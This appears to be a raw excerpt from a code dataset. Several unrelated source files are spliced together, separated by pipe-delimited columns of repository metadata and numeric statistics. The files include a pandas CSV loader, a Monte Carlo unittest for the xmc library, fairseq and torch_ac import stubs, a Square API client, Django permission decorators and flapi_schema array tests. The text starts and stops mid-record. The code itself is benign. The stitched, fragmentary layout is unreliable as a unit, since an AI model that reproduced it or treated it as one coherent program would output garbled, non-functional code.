    stream = pkg_resources.resource_stream(__name__, 'data/sp500_1970.csv')
    return pd.read_csv(stream, encoding='latin-1')
def sp500_2007():
    stream = pkg_resources.resource_stream(__name__, 'data/sp500_2007.csv')
    return pd.read_csv(stream, encoding='latin-1')
def sp500_1926():
    stream = pkg_resources.resource_stream(__name__, 'data/sp500_1926.csv')
    return pd.read_csv(stream, encoding='latin-1')
def illumina_2001():
    stream = pkg_resources.resource_stream(__name__, 'data/ILMN_2001.csv')
    return pd.read_csv(stream, encoding='latin-1')
def illumina_2017():
    stream = pkg_resources.resource_stream(__name__, 'data/ILMN_2017.csv')
    return pd.read_csv(stream, encoding='latin-1')
| 31.244444
| 75
| 0.72973
| 200
| 1,406
| 4.72
| 0.16
| 0.127119
| 0.17161
| 0.247881
| 0.880297
| 0.880297
| 0.880297
| 0.880297
| 0.444915
| 0.444915
| 0
| 0.101569
| 0.138691
| 1,406
| 44
| 76
| 31.954545
| 0.677952
| 0.014225
| 0
| 0.310345
| 0
| 0
| 0.167509
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.310345
| false
| 0
| 0.068966
| 0
| 0.689655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e886bdddb1bfe22c0f280e700586be08c92136d8
| 12,628
|
py
|
Python
|
applications/MultilevelMonteCarloApplication/tests/test_xmcAlgorithm.py
|
SADPR/Kratos
|
82d1e335d2e7e674f77022a3d91c958168805d59
|
[
"BSD-4-Clause"
] | null | null | null |
applications/MultilevelMonteCarloApplication/tests/test_xmcAlgorithm.py
|
SADPR/Kratos
|
82d1e335d2e7e674f77022a3d91c958168805d59
|
[
"BSD-4-Clause"
] | null | null | null |
applications/MultilevelMonteCarloApplication/tests/test_xmcAlgorithm.py
|
SADPR/Kratos
|
82d1e335d2e7e674f77022a3d91c958168805d59
|
[
"BSD-4-Clause"
] | null | null | null |
# Import python class test
import unittest
# Import python libraries
import json
import sys
import os
# Import xmc classes
import xmc
# Import PyCOMPSs
# from exaqute.ExaquteTaskPyCOMPSs import get_value_from_remote # to execute with runcompss
# from exaqute.ExaquteTaskHyperLoom import get_value_from_remote # to execute with the IT4 scheduler
from exaqute.ExaquteTaskLocal import get_value_from_remote # to execute with python3
class TestXMCAlgorithm(unittest.TestCase):
def test_mc_asynchronous_Kratos(self):
# read parameters
parametersList = ["parameters/parameters_xmc_test_mc_Kratos_asynchronous_poisson_2d.json", \
"parameters/parameters_xmc_test_mc_Kratos_asynchronous_poisson_2d_with_combined_power_sums.json", \
"parameters/parameters_xmc_test_mc_Kratos_asynchronous_poisson_2d_with_10_combined_power_sums.json", \
"parameters/parameters_xmc_test_mc_Kratos_poisson_2d.json", \
"parameters/parameters_xmc_test_mc_Kratos_poisson_2d_with_combined_power_sums.json"]
for parametersPath in parametersList:
with open(parametersPath,'r') as parameter_file:
parameters = json.load(parameter_file)
# add path of the problem folder to python path
problem_id = parameters["solverWrapperInputDictionary"]["problemId"]
sys.path.append(os.path.join("poisson_square_2d_xmc"))
# SampleGenerator
samplerInputDictionary = parameters["samplerInputDictionary"]
samplerInputDictionary['randomGeneratorInputDictionary'] = parameters["randomGeneratorInputDictionary"]
samplerInputDictionary['solverWrapperInputDictionary'] = parameters["solverWrapperInputDictionary"]
# MonteCarloIndex
monteCarloIndexInputDictionary = parameters["monteCarloIndexInputDictionary"]
monteCarloIndexInputDictionary["samplerInputDictionary"] = samplerInputDictionary
# Moment Estimators
qoiEstimatorInputDictionary = parameters["qoiEstimatorInputDictionary"]
combinedEstimatorInputDictionary = parameters["combinedEstimatorInputDictionary"]
costEstimatorInputDictionary = parameters["costEstimatorInputDictionary"]
# qoi estimators
monteCarloIndexInputDictionary["qoiEstimator"] = [monteCarloIndexInputDictionary["qoiEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberQoI"])]
monteCarloIndexInputDictionary["qoiEstimatorInputDictionary"] = [qoiEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberQoI"]
# combined estimators
monteCarloIndexInputDictionary["combinedEstimator"] = [monteCarloIndexInputDictionary["combinedEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberCombinedQoi"])]
monteCarloIndexInputDictionary["combinedEstimatorInputDictionary"] = [combinedEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberCombinedQoi"]
# cost estimator
monteCarloIndexInputDictionary["costEstimatorInputDictionary"] = costEstimatorInputDictionary
# MonoCriterion
criteriaArray = []
criteriaInputs = []
for monoCriterion in (parameters["monoCriteriaInpuctDict"]):
criteriaArray.append(xmc.monoCriterion.MonoCriterion(\
parameters["monoCriteriaInpuctDict"][monoCriterion]["criteria"],\
parameters["monoCriteriaInpuctDict"][monoCriterion]["tolerance"]))
criteriaInputs.append([parameters["monoCriteriaInpuctDict"][monoCriterion]["input"]])
# MultiCriterion
multiCriterionInputDictionary=parameters["multiCriterionInputDictionary"]
multiCriterionInputDictionary["criteria"] = criteriaArray
multiCriterionInputDictionary["inputsForCriterion"] = criteriaInputs
criterion = xmc.multiCriterion.MultiCriterion(**multiCriterionInputDictionary)
# ErrorEstimator
statErrorEstimator = xmc.errorEstimator.ErrorEstimator(**parameters["errorEstimatorInputDictionary"])
# HierarchyOptimiser
hierarchyCostOptimiser = xmc.hierarchyOptimiser.HierarchyOptimiser(**parameters["hierarchyOptimiserInputDictionary"])
# EstimationAssembler
if "expectationAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
expectationAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["expectationAssembler"])
if "varianceAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
varianceAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["varianceAssembler"])
# MonteCarloSampler
monteCarloSamplerInputDictionary = parameters["monteCarloSamplerInputDictionary"]
monteCarloSamplerInputDictionary["indexConstructorDictionary"] = monteCarloIndexInputDictionary
monteCarloSamplerInputDictionary["assemblers"] = [expectationAssembler,varianceAssembler]
monteCarloSamplerInputDictionary["errorEstimators"] = [statErrorEstimator]
mcSampler = xmc.monteCarloSampler.MonteCarloSampler(**monteCarloSamplerInputDictionary)
# XMCAlgorithm
XMCAlgorithmInputDictionary = parameters["XMCAlgorithmInputDictionary"]
XMCAlgorithmInputDictionary["monteCarloSampler"] = mcSampler
XMCAlgorithmInputDictionary["hierarchyOptimiser"] = hierarchyCostOptimiser
XMCAlgorithmInputDictionary["stoppingCriterion"] = criterion
algo = xmc.XMCAlgorithm(**XMCAlgorithmInputDictionary)
if (parameters["solverWrapperInputDictionary"]["asynchronous"] is True):
algo.runAsynchronousXMC()
else:
algo.runXMC()
# test
estimations = get_value_from_remote(algo.estimation())
estimated_mean = 1.5
self.assertAlmostEqual(estimations[0],estimated_mean,delta=0.1)
self.assertEqual(algo.monteCarloSampler.indices[0].costEstimator._sampleCounter,15)
def test_mlmc_asynchronous_Kratos(self):
# read parameters
parametersList = ["parameters/parameters_xmc_test_mlmc_Kratos_asynchronous_poisson_2d.json", \
"parameters/parameters_xmc_test_mlmc_Kratos_asynchronous_poisson_2d_with_combined_power_sums.json", \
"parameters/parameters_xmc_test_mlmc_Kratos_poisson_2d.json", \
"parameters/parameters_xmc_test_mlmc_Kratos_poisson_2d_with_combined_power_sums.json"]
for parametersPath in parametersList:
with open(parametersPath,'r') as parameter_file:
parameters = json.load(parameter_file)
# add path of the problem folder to python path
problem_id = parameters["solverWrapperInputDictionary"]["problemId"]
sys.path.append(os.path.join("poisson_square_2d_xmc"))
# SampleGenerator
samplerInputDictionary = parameters["samplerInputDictionary"]
samplerInputDictionary['randomGeneratorInputDictionary'] = parameters["randomGeneratorInputDictionary"]
samplerInputDictionary['solverWrapperInputDictionary'] = parameters["solverWrapperInputDictionary"]
# MonteCarloIndex Constructor
monteCarloIndexInputDictionary = parameters["monteCarloIndexInputDictionary"]
monteCarloIndexInputDictionary["samplerInputDictionary"] = samplerInputDictionary
# Moment Estimators
qoiEstimatorInputDictionary = parameters["qoiEstimatorInputDictionary"]
combinedEstimatorInputDictionary = parameters["combinedEstimatorInputDictionary"]
costEstimatorInputDictionary = parameters["costEstimatorInputDictionary"]
# qoi estimators
monteCarloIndexInputDictionary["qoiEstimator"] = [monteCarloIndexInputDictionary["qoiEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberQoI"])]
monteCarloIndexInputDictionary["qoiEstimatorInputDictionary"] = [qoiEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberQoI"]
# combined estimators
monteCarloIndexInputDictionary["combinedEstimator"] = [monteCarloIndexInputDictionary["combinedEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberCombinedQoi"])]
monteCarloIndexInputDictionary["combinedEstimatorInputDictionary"] = [combinedEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberCombinedQoi"]
# cost estimator
monteCarloIndexInputDictionary["costEstimatorInputDictionary"] = costEstimatorInputDictionary
# MonoCriterion
criteriaArray = []
criteriaInputs = []
for monoCriterion in (parameters["monoCriteriaInpuctDict"]):
criteriaArray.append(xmc.monoCriterion.MonoCriterion(\
parameters["monoCriteriaInpuctDict"][monoCriterion]["criteria"],\
parameters["monoCriteriaInpuctDict"][monoCriterion]["tolerance"]))
criteriaInputs.append([parameters["monoCriteriaInpuctDict"][monoCriterion]["input"]])
# MultiCriterion
multiCriterionInputDictionary=parameters["multiCriterionInputDictionary"]
multiCriterionInputDictionary["criteria"] = criteriaArray
multiCriterionInputDictionary["inputsForCriterion"] = criteriaInputs
criterion = xmc.multiCriterion.MultiCriterion(**multiCriterionInputDictionary)
# ErrorEstimator
MSEErrorEstimator = xmc.errorEstimator.ErrorEstimator(**parameters["errorEstimatorInputDictionary"])
# HierarchyOptimiser
hierarchyCostOptimiser = xmc.hierarchyOptimiser.HierarchyOptimiser(**parameters["hierarchyOptimiserInputDictionary"])
# EstimationAssembler
if "expectationAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
expectationAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["expectationAssembler"])
if "discretizationErrorAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
discretizationErrorAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["discretizationErrorAssembler"])
if "varianceAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
varianceAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["varianceAssembler"])
# MonteCarloSampler
monteCarloSamplerInputDictionary = parameters["monteCarloSamplerInputDictionary"]
monteCarloSamplerInputDictionary["indexConstructorDictionary"] = monteCarloIndexInputDictionary
monteCarloSamplerInputDictionary["assemblers"] = [expectationAssembler,discretizationErrorAssembler,varianceAssembler]
monteCarloSamplerInputDictionary["errorEstimators"] = [MSEErrorEstimator]
mcSampler = xmc.monteCarloSampler.MonteCarloSampler(**monteCarloSamplerInputDictionary)
# XMCAlgorithm
XMCAlgorithmInputDictionary = parameters["XMCAlgorithmInputDictionary"]
XMCAlgorithmInputDictionary["monteCarloSampler"] = mcSampler
XMCAlgorithmInputDictionary["hierarchyOptimiser"] = hierarchyCostOptimiser
XMCAlgorithmInputDictionary["stoppingCriterion"] = criterion
algo = xmc.XMCAlgorithm(**XMCAlgorithmInputDictionary)
if (parameters["solverWrapperInputDictionary"]["asynchronous"] is True):
algo.runAsynchronousXMC()
else:
algo.runXMC()
# test
estimations = get_value_from_remote(algo.estimation())
estimated_mean = 1.47
self.assertAlmostEqual(estimations[0],estimated_mean,delta=1.0)
self.assertEqual(algo.monteCarloSampler.indices[0].costEstimator._sampleCounter,15) # level 0
self.assertEqual(algo.monteCarloSampler.indices[1].costEstimator._sampleCounter,15) # level 1
self.assertEqual(algo.monteCarloSampler.indices[2].costEstimator._sampleCounter,15) # level 2
if __name__ == '__main__':
unittest.main()
| 68.259459
| 205
| 0.72949
| 783
| 12,628
| 11.595147
| 0.182631
| 0.058597
| 0.0228
| 0.026765
| 0.914969
| 0.905606
| 0.895693
| 0.884459
| 0.872233
| 0.835334
| 0
| 0.004797
| 0.191083
| 12,628
| 184
| 206
| 68.630435
| 0.883994
| 0.070874
| 0
| 0.738462
| 0
| 0
| 0.291324
| 0.234001
| 0
| 0
| 0
| 0
| 0.046154
| 1
| 0.015385
| false
| 0
| 0.046154
| 0
| 0.069231
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e8a39caeaa2ffe1151301a707fa9886859204d03
| 165
|
py
|
Python
|
fairseq_ext/__init__.py
|
IBM/transition-amr-parser
|
dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e
|
[
"Apache-2.0"
] | 76
|
2019-11-25T04:00:15.000Z
|
2022-03-31T00:33:44.000Z
|
fairseq_ext/__init__.py
|
IBM/transition-amr-parser
|
dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e
|
[
"Apache-2.0"
] | 22
|
2019-10-10T09:39:24.000Z
|
2022-03-28T06:39:06.000Z
|
fairseq_ext/__init__.py
|
IBM/transition-amr-parser
|
dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e
|
[
"Apache-2.0"
] | 20
|
2019-10-08T17:02:17.000Z
|
2022-03-20T01:43:42.000Z
|
# to register all the user defined modules to fairseq
import fairseq_ext.criterions # noqa
import fairseq_ext.models # noqa
import fairseq_ext.tasks # noqa
| 33
| 53
| 0.769697
| 24
| 165
| 5.166667
| 0.583333
| 0.314516
| 0.387097
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187879
| 165
| 4
| 54
| 41.25
| 0.925373
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2cebdbc8b84264e3d13f4d9a1a1ff7a419f735e0
| 119
|
py
|
Python
|
torch_ac/algos/__init__.py
|
jsikyoon/torch-ac
|
4d44ed3eb7a81a583a0c9619e0d4fb142a4a3d6b
|
[
"MIT"
] | 1
|
2021-03-19T02:59:45.000Z
|
2021-03-19T02:59:45.000Z
|
torch_ac/algos/__init__.py
|
jsikyoon/torch-ac
|
4d44ed3eb7a81a583a0c9619e0d4fb142a4a3d6b
|
[
"MIT"
] | null | null | null |
torch_ac/algos/__init__.py
|
jsikyoon/torch-ac
|
4d44ed3eb7a81a583a0c9619e0d4fb142a4a3d6b
|
[
"MIT"
] | 1
|
2021-12-12T18:22:03.000Z
|
2021-12-12T18:22:03.000Z
|
from torch_ac.algos.a2c import A2CAlgo
from torch_ac.algos.ppo import PPOAlgo
from torch_ac.algos.vmpo import VMPOAlgo
| 29.75
| 40
| 0.848739
| 21
| 119
| 4.666667
| 0.52381
| 0.27551
| 0.336735
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018692
| 0.10084
| 119
| 3
| 41
| 39.666667
| 0.897196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2cf53bd8619663ea95a94c01698a295351390604
| 7,947
|
py
|
Python
|
square/api/reporting_api.py
|
hellysmile/square-python-sdk
|
5e68efd2c4a2210ef681e87710eba981a019dd08
|
[
"Apache-2.0"
] | null | null | null |
square/api/reporting_api.py
|
hellysmile/square-python-sdk
|
5e68efd2c4a2210ef681e87710eba981a019dd08
|
[
"Apache-2.0"
] | null | null | null |
square/api/reporting_api.py
|
hellysmile/square-python-sdk
|
5e68efd2c4a2210ef681e87710eba981a019dd08
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
square
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
from deprecation import deprecated
from square.api_helper import APIHelper
from square.http.api_response import ApiResponse
from square.api.base_api import BaseApi
from square.http.auth.o_auth_2 import OAuth2
class ReportingApi(BaseApi):
"""A Controller to access Endpoints in the square API."""
def __init__(self, config, call_back=None):
super(ReportingApi, self).__init__(config, call_back)
@deprecated()
def list_additional_recipient_receivable_refunds(self,
location_id,
begin_time=None,
end_time=None,
sort_order=None,
cursor=None):
"""Does a GET request to /v2/locations/{location_id}/additional-recipient-receivable-refunds.
Returns a list of refunded transactions (across all possible
originating locations) relating to monies
credited to the provided location ID by another Square account using
the `additional_recipients` field in a transaction.
Max results per [page](#paginatingresults): 50
Args:
location_id (string): The ID of the location to list
AdditionalRecipientReceivableRefunds for.
begin_time (string, optional): The beginning of the requested
reporting period, in RFC 3339 format. See [Date
ranges](#dateranges) for details on date
inclusivity/exclusivity. Default value: The current time
minus one year.
end_time (string, optional): The end of the requested reporting
period, in RFC 3339 format. See [Date ranges](#dateranges)
for details on date inclusivity/exclusivity. Default value:
The current time.
sort_order (SortOrder, optional): The order in which results are
listed in the response (`ASC` for oldest first, `DESC` for
newest first). Default value: `DESC`
cursor (string, optional): A pagination cursor returned by a
previous call to this endpoint. Provide this to retrieve the
next set of results for your original query. See [Paginating
results](#paginatingresults) for more information.
Returns:
ListAdditionalRecipientReceivableRefundsResponse: Response from
the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/v2/locations/{location_id}/additional-recipient-receivable-refunds'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'location_id': location_id
})
_query_builder = self.config.get_base_uri()
_query_builder += _url_path
_query_parameters = {
'begin_time': begin_time,
'end_time': end_time,
'sort_order': sort_order,
'cursor': cursor
}
_query_builder = APIHelper.append_url_with_query_parameters(
_query_builder,
_query_parameters
)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
OAuth2.apply(self.config, _request)
_response = self.execute_request(_request)
decoded = APIHelper.json_deserialize(_response.text)
if type(decoded) is dict:
_errors = decoded.get('errors')
else:
_errors = None
_result = ApiResponse(_response, body=decoded, errors=_errors)
return _result
@deprecated()
def list_additional_recipient_receivables(self,
location_id,
begin_time=None,
end_time=None,
sort_order=None,
cursor=None):
"""Does a GET request to /v2/locations/{location_id}/additional-recipient-receivables.
Returns a list of receivables (across all possible sending locations)
representing monies credited
to the provided location ID by another Square account using the
`additional_recipients` field in a transaction.
Max results per [page](#paginatingresults): 50
Args:
location_id (string): The ID of the location to list
AdditionalRecipientReceivables for.
begin_time (string, optional): The beginning of the requested
reporting period, in RFC 3339 format. See [Date
ranges](#dateranges) for details on date
inclusivity/exclusivity. Default value: The current time
minus one year.
end_time (string, optional): The end of the requested reporting
period, in RFC 3339 format. See [Date ranges](#dateranges)
for details on date inclusivity/exclusivity. Default value:
The current time.
sort_order (SortOrder, optional): The order in which results are
listed in the response (`ASC` for oldest first, `DESC` for
newest first). Default value: `DESC`
cursor (string, optional): A pagination cursor returned by a
previous call to this endpoint. Provide this to retrieve the
next set of results for your original query. See [Paginating
results](#paginatingresults) for more information.
Returns:
ListAdditionalRecipientReceivablesResponse: Response from the API.
Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/v2/locations/{location_id}/additional-recipient-receivables'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'location_id': location_id
})
_query_builder = self.config.get_base_uri()
_query_builder += _url_path
_query_parameters = {
'begin_time': begin_time,
'end_time': end_time,
'sort_order': sort_order,
'cursor': cursor
}
_query_builder = APIHelper.append_url_with_query_parameters(
_query_builder,
_query_parameters
)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
OAuth2.apply(self.config, _request)
_response = self.execute_request(_request)
decoded = APIHelper.json_deserialize(_response.text)
if type(decoded) is dict:
_errors = decoded.get('errors')
else:
_errors = None
_result = ApiResponse(_response, body=decoded, errors=_errors)
return _result
| 41.826316
| 101
| 0.597206
| 826
| 7,947
| 5.544794
| 0.231235
| 0.030568
| 0.016594
| 0.018341
| 0.842358
| 0.826638
| 0.826638
| 0.821834
| 0.81441
| 0.81441
| 0
| 0.005916
| 0.340632
| 7,947
| 189
| 102
| 42.047619
| 0.86813
| 0.473135
| 0
| 0.780488
| 1
| 0
| 0.07529
| 0.035025
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036585
| false
| 0
| 0.060976
| 0
| 0.134146
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa23706ab7a579acbe270a2e19ee3ed857c0aff7
| 1,467
|
py
|
Python
|
common/perm.py
|
BUPT-XJBGroup/BOJ-V4
|
31078ab998d0a786c6742b8f7c65f2e4d9642844
|
[
"MIT"
] | null | null | null |
common/perm.py
|
BUPT-XJBGroup/BOJ-V4
|
31078ab998d0a786c6742b8f7c65f2e4d9642844
|
[
"MIT"
] | null | null | null |
common/perm.py
|
BUPT-XJBGroup/BOJ-V4
|
31078ab998d0a786c6742b8f7c65f2e4d9642844
|
[
"MIT"
] | null | null | null |
from functools import wraps
from contest.models import Contest
from django.http import HttpResponseRedirect, JsonResponse, Http404
def view_permission_required(func):
def decorator(func):
@wraps(func)
def returned_wrapper(request, *args, **kwargs):
pk = kwargs.get('pk')
contest = Contest.objects.filter(pk=pk).first()
if pk and contest:
if request.user.has_perm('ojuser.view_groupprofile', contest.group) and contest.ended() >= 0:
return func(request, *args, **kwargs)
elif request.user.has_perm('ojuser.change_groupprofile', contest.group):
return func(request, *args, **kwargs)
raise Http404()
return returned_wrapper
if not func:
def foo(func):
return decorator(func)
return foo
return decorator(func)
def change_permission_required(func):
def decorator(func):
@wraps(func)
def returned_wrapper(request, *args, **kwargs):
pk = kwargs.get('pk')
contest = Contest.objects.filter(pk=pk).first()
if pk and contest and request.user.has_perm('ojuser.change_groupprofile', contest.group):
return func(request, *args, **kwargs)
raise Http404()
return returned_wrapper
if not func:
def foo(func):
return decorator(func)
return foo
return decorator(func)
| 34.116279
| 109
| 0.611452
| 165
| 1,467
| 5.351515
| 0.260606
| 0.055493
| 0.096263
| 0.061155
| 0.793884
| 0.736127
| 0.736127
| 0.736127
| 0.736127
| 0.736127
| 0
| 0.009597
| 0.289707
| 1,467
| 42
| 110
| 34.928571
| 0.837812
| 0
| 0
| 0.75
| 0
| 0
| 0.054608
| 0.051877
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.083333
| 0.055556
| 0.611111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
fa3ab431dde8781bff5297c9338140fd849c8037
| 98
|
py
|
Python
|
apps/validators/password_validator.py
|
LucasRohr/flask-api
|
42e971a60ad0e32f8b59ec22089e8d39aecce595
|
[
"BSD-3-Clause"
] | 1
|
2020-02-15T02:22:48.000Z
|
2020-02-15T02:22:48.000Z
|
apps/validators/password_validator.py
|
LucasRohr/flask-api
|
42e971a60ad0e32f8b59ec22089e8d39aecce595
|
[
"BSD-3-Clause"
] | 6
|
2020-03-24T18:15:25.000Z
|
2021-12-13T20:32:44.000Z
|
apps/validators/password_validator.py
|
LucasRohr/flask-api
|
42e971a60ad0e32f8b59ec22089e8d39aecce595
|
[
"BSD-3-Clause"
] | null | null | null |
def check_password_in_signup(password, confirm_password):
    return password == confirm_password
| 32.666667
| 57
| 0.826531
| 12
| 98
| 6.333333
| 0.583333
| 0.394737
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112245
| 98
| 2
| 58
| 49
| 0.873563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 1
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
d76f95c95dfc12899629fdabbffedc6ed60d2389
| 2,586
|
py
|
Python
|
tests/types/test_array.py
|
manoadamro/flapi-schema
|
840cfe4bd0ff1e057c3ace9931bd35d8fdaf7808
|
[
"MIT"
] | null | null | null |
tests/types/test_array.py
|
manoadamro/flapi-schema
|
840cfe4bd0ff1e057c3ace9931bd35d8fdaf7808
|
[
"MIT"
] | null | null | null |
tests/types/test_array.py
|
manoadamro/flapi-schema
|
840cfe4bd0ff1e057c3ace9931bd35d8fdaf7808
|
[
"MIT"
] | null | null | null |
import unittest
import flapi_schema.errors
import flapi_schema.types
class BasicSchema(flapi_schema.types.Schema):
thing = flapi_schema.types.Bool()
class ArrayTest(unittest.TestCase):
def test_min_only(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, min_length=0)
self.assertEqual(prop([True, True]), [True, True])
def test_min_only_out_of_range(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, min_length=1)
self.assertRaises(flapi_schema.errors.SchemaValidationError, prop, [])
def test_max_only(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, max_length=3)
self.assertEqual(prop([True, True]), [True, True])
def test_max_only_out_of_range(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, max_length=3)
self.assertRaises(
flapi_schema.errors.SchemaValidationError, prop, [True, True, True, True]
)
def test_min_and_max(self):
prop = flapi_schema.types.Array(
flapi_schema.types.Bool, min_length=0, max_length=3
)
self.assertEqual(prop([True, True]), [True, True])
def test_min_and_max_out_of_range(self):
prop = flapi_schema.types.Array(
flapi_schema.types.Bool, min_length=0, max_length=3
)
self.assertRaises(
flapi_schema.errors.SchemaValidationError, prop, [True, True, True, True]
)
def test_no_range(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool)
self.assertEqual(prop([True, True, True, True]), [True, True, True, True])
def test_array_of_property(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool)
self.assertEqual(prop([True, True]), [True, True])
def test_array_of_property_fails(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool)
self.assertRaises(flapi_schema.errors.SchemaValidationError, prop, [True, ""])
def test_wrong_type(self):
prop = flapi_schema.types.Array(BasicSchema, callback=None)
self.assertRaises(flapi_schema.errors.SchemaValidationError, prop, 12)
def test_callback(self):
prop = flapi_schema.types.Array(
BasicSchema, callback=lambda v: [{"thing": True}]
)
self.assertEqual(prop([{"thing": False}, {"thing": False}]), [{"thing": True}])
def test_no_callback(self):
prop = flapi_schema.types.Array(BasicSchema, callback=None)
self.assertEqual(prop([{"thing": False}]), [{"thing": False}])
| 37.478261
| 87
| 0.677108
| 330
| 2,586
| 5.078788
| 0.130303
| 0.196897
| 0.229117
| 0.136038
| 0.855609
| 0.855609
| 0.855609
| 0.74463
| 0.710024
| 0.636038
| 0
| 0.004824
| 0.198376
| 2,586
| 68
| 88
| 38.029412
| 0.803666
| 0
| 0
| 0.384615
| 0
| 0
| 0.011601
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 1
| 0.230769
| false
| 0
| 0.057692
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d78765ce2387258c1ebbe7af31057e0c66a7f90a
| 8,885
|
py
|
Python
|
parser/fase2/team26/G26/C3D/expresiones.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 35
|
2020-12-07T03:11:43.000Z
|
2021-04-15T17:38:16.000Z
|
